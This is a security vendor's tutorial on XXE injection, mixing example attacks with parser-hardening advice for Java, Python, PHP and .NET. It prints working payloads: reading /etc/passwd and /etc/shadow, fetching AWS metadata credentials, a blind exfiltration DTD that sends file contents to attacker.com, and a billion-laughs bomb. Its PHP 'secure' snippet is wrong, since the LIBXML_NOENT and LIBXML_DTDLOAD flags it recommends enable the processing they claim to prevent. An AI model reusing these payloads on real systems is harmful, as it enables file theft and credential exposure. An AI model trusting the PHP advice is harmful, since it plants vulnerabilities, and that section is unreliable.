XXE Injection: XML External Entity Attacks Explained
XXE injection (XML External Entity injection) is a class of attacks targeting applications that parse XML input. When an XML parser is configured to process external entity declarations, an attacker can use them to read arbitrary files from the server, perform server-side request forgery, execute denial-of-service attacks, or in some cases achieve remote code execution. XXE is a well-documented OWASP Top 10 vulnerability that persists because the secure configuration requires explicitly disabling features that are enabled by default in many XML libraries.
[Scan your web application for security misconfigurations with ZeriFlow](https://zeriflow.com) — 80+ checks, completely free.
Understanding XML External Entities
XML supports a feature called "entities" — shortcuts for content. Internal entities are harmless:
<!DOCTYPE note [
<!ENTITY company 'Acme Corporation'>
]>
<note>From: &company;</note>External entities fetch content from a URI:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/passwd'>
]>
<foo>&xxe;</foo>When the XML parser processes &xxe;, it opens /etc/passwd and inserts its contents into the XML document. If the application returns the parsed XML (or part of it) in the response, the attacker receives the file contents.
XXE Attack Types
File Disclosure (Classic XXE)
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'file:///etc/shadow'>
]>
<order>
<item>&xxe;</item>
</order>Target files on Linux:
- /etc/passwd — user accounts
- /etc/shadow — password hashes (requires root)
- /proc/self/environ — environment variables (may contain secrets)
- /proc/self/cmdline — running command
- ~/.ssh/id_rsa — SSH private key
- Application config files with database credentials
On Windows:
- C:\Windows\System32\drivers\etc\hosts
- C:\inetpub\wwwroot\web.config (IIS configuration, may contain credentials)
SSRF via XXE
External entities can use HTTP/HTTPS instead of file://:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/'>
]>
<foo>&xxe;</foo>This turns the XXE into an SSRF attack against the AWS metadata service — the same devastating capability described in our SSRF guide, but triggered through XML parsing.
Blind XXE (Out-of-Band)
When the application doesn't reflect the entity value in the response, attackers use out-of-band channels:
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM 'http://attacker.com/malicious.dtd'>
%xxe;
]>
<foo/>malicious.dtd on the attacker's server:
<!ENTITY % file SYSTEM 'file:///etc/passwd'>
<!ENTITY % ooband '<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>'>
%ooband;The file contents are exfiltrated via DNS or HTTP requests to the attacker's server — even without seeing any response.
Billion Laughs (XML Bomb / DoS)
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol 'lol'>
<!ENTITY lol2 '&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;'>
<!ENTITY lol3 '&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;'>
<!ENTITY lol4 '&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;'>
<!-- ... up to lol9 -->
<!ENTITY lol9 '&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;'>
]>
<lolz>&lol9;</lolz>This tiny document (< 1KB) expands to approximately 10^9 (a billion) "lol" strings — consuming gigabytes of memory and crashing the parser.
Affected Applications and Formats
XXE affects more than obvious XML parsers. Any format built on XML is potentially vulnerable:
- SOAP web services: Request bodies are XML
- SVG file upload processing
- DOCX, XLSX, PPTX uploads: Microsoft Office formats are ZIP archives containing XML
- RSS/Atom feed parsers
- SAML authentication: Authentication assertions are XML-signed
- GPX, KML files: Geospatial formats
- Android APK manifest processing
SAML XXE is particularly dangerous: if an attacker can forge a SAML response (or if the IDP is compromised), they can embed XXE in the SAML assertion and attack the service provider's XML parser during authentication.
Secure Parser Configuration
Java (Most Vulnerable By Default)
Java's built-in XML parsers (DocumentBuilder, SAXParser, XMLStreamReader) enable external entities by default. Disable them explicitly:
// Secure DocumentBuilderFactory configuration
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Disable DOCTYPE declarations entirely (safest)
dbf.setFeature('http://apache.org/xml/features/disallow-doctype-decl', true);
// Or disable external entities specifically:
dbf.setFeature('http://xml.org/sax/features/external-general-entities', false);
dbf.setFeature('http://xml.org/sax/features/external-parameter-entities', false);
dbf.setFeature('http://apache.org/xml/features/nonvalidating/load-external-dtd', false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
DocumentBuilder db = dbf.newDocumentBuilder();
Document doc = db.parse(inputStream);Python
Python's xml.etree.ElementTree is safe from external entity attacks in Python 3.8+, but lxml requires configuration:
from lxml import etree
# VULNERABLE (default lxml)
tree = etree.parse(xml_input)
# SECURE lxml
parser = etree.XMLParser(
no_network=True, # no external network fetching
load_dtd=False, # don't load external DTDs
resolve_entities=False # don't resolve entities
)
tree = etree.parse(xml_input, parser)For the defusedxml library — specifically designed to prevent XXE and related attacks:
import defusedxml.ElementTree as ET
# defusedxml raises on external entities, DOCTYPE, etc.
tree = ET.parse(xml_input) # safe by defaultPHP
// Disable external entity loading globally (PHP < 8.0)
libxml_disable_entity_loader(true); // deprecated in PHP 8.0
// PHP 8.0+: use LIBXML_NOENT flag carefully, disable LIBXML_DTDLOAD
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NONET | LIBXML_DTDLOAD);
// Safer alternative: SimpleXML with these flags
$xml = simplexml_load_string($input, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_NONET);Note: In PHP 8.0+, libxml_disable_entity_loader() was deprecated because external entity loading is disabled by default. But verify this for your specific version.
.NET (C#)
// .NET 4.5.2+ has safe defaults, but be explicit:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // block DOCTYPE
settings.XmlResolver = null; // no external resolution
using (XmlReader reader = XmlReader.Create(stream, settings))
{
// parse safely
}Testing for XXE
Basic test payload to confirm XXE:
<?xml version='1.0'?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM 'http://your-burp-collaborator.com/xxe-test'>
]>
<test>&xxe;</test>If you see a DNS lookup or HTTP request to your collaborator server, the parser is processing external entities. Use Burp Suite's Collaborator or similar OOB infrastructure.
FAQ
Q: Which languages/parsers are safe from XXE by default?
A: Python's xml.etree.ElementTree (since Python 3.8), Go's encoding/xml, and Ruby's REXML are generally considered safe by default. Java's built-in parsers, PHP's libxml, and most C/C++ libxml2 bindings are not safe by default and require explicit hardening. Always check the specific version and configuration of your parser.
Q: Can JSON APIs be vulnerable to XXE?
A: Pure JSON parsers are not vulnerable to XXE. However, some applications accept both JSON and XML based on Content-Type. Submitting an XML body to a JSON endpoint that falls back to an XML parser can trigger XXE. Ensure all content-type handling is strict — reject XML where only JSON is expected.
Q: Is XXE the same as SSRF?
A: XXE can be used to achieve SSRF (by having external entities fetch HTTP URLs), but they're distinct vulnerability classes. XXE specifically exploits XML parser features; SSRF is a broader class of server-side URL fetching vulnerabilities. XXE is one of several ways to trigger SSRF.
Q: Does a WAF protect against XXE?
A: WAFs can detect common XXE patterns (DOCTYPE declarations, SYSTEM keyword in specific positions), but advanced blind XXE using parameter entities and out-of-band channels can bypass many WAF rules. Fix the parser configuration directly rather than relying on WAF rules as the primary defense.
Q: How do I find XXE vulnerabilities in my codebase?
A: Search for XML parsing calls in your codebase: DocumentBuilder, SAXParser, lxml.etree.parse, DOMDocument::loadXML, simplexml_load_string. Audit each one for the security features described above. Then test with the payloads in this guide against all endpoints that accept XML, DOCX, SVG, or other XML-based formats. ZeriFlow scans for server-level misconfigurations that may increase XXE exposure.
Conclusion
XXE injection persists because the secure configuration requires disabling features that are enabled by default in most XML libraries — and many developers don't know the feature exists until they read about an attack. The fix is straightforward: configure your parser to prohibit DOCTYPE declarations and external entity resolution.
Audit every XML parser in your codebase this week. Check Java DocumentBuilders, PHP DOMDocument instances, Python lxml parsers. Consider switching to defusedxml in Python projects for a hardened-by-default experience.
[Scan your application with ZeriFlow](https://zeriflow.com) for security misconfigurations that could amplify XXE impact — free, 80+ checks, no account required. Then fix your parsers. In that order.